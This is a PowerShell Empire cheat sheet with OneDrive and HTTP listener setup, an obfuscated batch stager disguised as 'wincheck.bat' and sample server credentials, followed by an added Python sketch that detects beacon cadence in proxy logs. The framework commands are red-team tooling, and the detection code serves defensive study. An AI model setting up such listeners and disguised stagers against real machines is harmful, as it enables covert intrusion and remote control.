PowerShell Empire
on Kali-Linux
Start Server
sudo powershell-empire server
powershell-empire server --username alice --password root00
RESTful API on port 1337, SocketIO on port 5000
Credentials: username empireadmin, password password123
Empire GUI Starkiller (https://github.com/BC-SECURITY/Starkiller)
sudo apt update && sudo apt install -y starkiller
Listeners
listeners > uselistener
Available listener types: dbx, http, meterpreter, redirector
OneDrive Listener (notes from http://gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9)
Create an app at https://apps.dev.microsoft.com
The only things you need are an app password ("Generate new password"), an app platform with a redirect URL ("https://login.live.com/oauth20_desktop.srf" works well as a default), and the delegated permissions Files.ReadWrite, User.Read, and offline_access. Example: https://imgur.com/a/rd47l
Once you create the app, you will be given an Application ID. Enter this into your listener options:
set ClientId <your Application ID>
set ClientSecret <your application secret/password>
Then run "execute". This will not start the listener yet, but will give you an OAuth URL to sign in to. You will be redirected to a URL like "https://login.live.com/oauth20_desktop.srf?code=M12ac16111-a605-42e9-9dbf-c155de30cfc6&lc=1033". Take the code parameter from that URL and enter it into the listener options:
set AuthCode M12ac16111-a605-42e9-9dbf-c155de30cfc6
Run "execute" again, and the listener will start.
You will not have to repeat this process at every start-up, because the listener stores a refresh token. That token may expire after a week or two, after which the sign-in process must be done again.
Examples
http Listener
uselistener http
set Name demo_http1776
set Port 1776
set WorkingHours 07:00-19:00
set DefaultDelay 5
set DefaultJitter 0.8
set SlackURL https://hooks.slack.com/services/ABC/ABC/1234
execute
usestager windows/launcher_bat
set Listener demo_http1776
set Obfuscate True
set OutFile wincheck.bat
execute
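From the defender's side, the DefaultDelay, DefaultJitter and WorkingHours values in the http listener example above fix the cadence of an agent's check-ins, and that cadence is what a proxy-log beaconing check keys on. The following is an added illustration, not code from this page or from the Empire project; it assumes (not stated on the page) that an agent sleeps for a value drawn uniformly between delay*(1-jitter) and delay*(1+jitter) seconds, and all timestamps are constructed sample data.

```python
import random
from datetime import datetime, timedelta

def sleep_bounds(delay, jitter):
    # Assumed sleep model (not from the page): the agent sleeps for a value
    # drawn uniformly from [delay*(1-jitter), delay*(1+jitter)] seconds.
    return delay * (1 - jitter), delay * (1 + jitter)

def looks_like_beacon(timestamps, delay, jitter, min_gaps=20, slack=1.0):
    """True when at least 90% of inter-request gaps fit the configured sleep range."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < min_gaps:
        return False
    lo, hi = sleep_bounds(delay, jitter)
    fitting = sum(1 for g in gaps if lo - slack <= g <= hi + slack)
    return fitting / len(gaps) >= 0.9

def all_within_hours(timestamps, spec):
    """spec uses the page's WorkingHours form, e.g. '07:00-19:00' (end exclusive)."""
    start, end = (int(part.split(":")[0]) for part in spec.split("-"))
    return all(start <= t.hour < end for t in timestamps)

def constructed_series(start, n, lo, hi, seed):
    """Constructed sample timestamps with gaps drawn uniformly from [lo, hi] seconds."""
    rng, t, out = random.Random(seed), start, []
    for _ in range(n):
        out.append(t)
        t += timedelta(seconds=rng.randint(lo, hi))
    return out

def demo():
    """Agent-like cadence (delay 5, jitter 0.8 -> 1..9 s gaps) vs. irregular browsing."""
    delay, jitter, hours = 5, 0.8, "07:00-19:00"
    lo, hi = sleep_bounds(delay, jitter)
    agent = constructed_series(datetime(2024, 1, 8, 9, 0), 40, round(lo), round(hi), 1)
    browsing = constructed_series(datetime(2024, 1, 8, 9, 0), 40, 0, 600, 2)
    return {
        "agent_is_beacon": looks_like_beacon(agent, delay, jitter),
        "agent_in_working_hours": all_within_hours(agent, hours),
        "browsing_is_beacon": looks_like_beacon(browsing, delay, jitter),
    }

if __name__ == "__main__":
    print(demo())
```

Short sleeps with high jitter still cluster inside a narrow band, which is why the gap-range test separates the agent series from the browsing series; a WorkingHours window additionally means no check-ins at all outside 07:00-19:00.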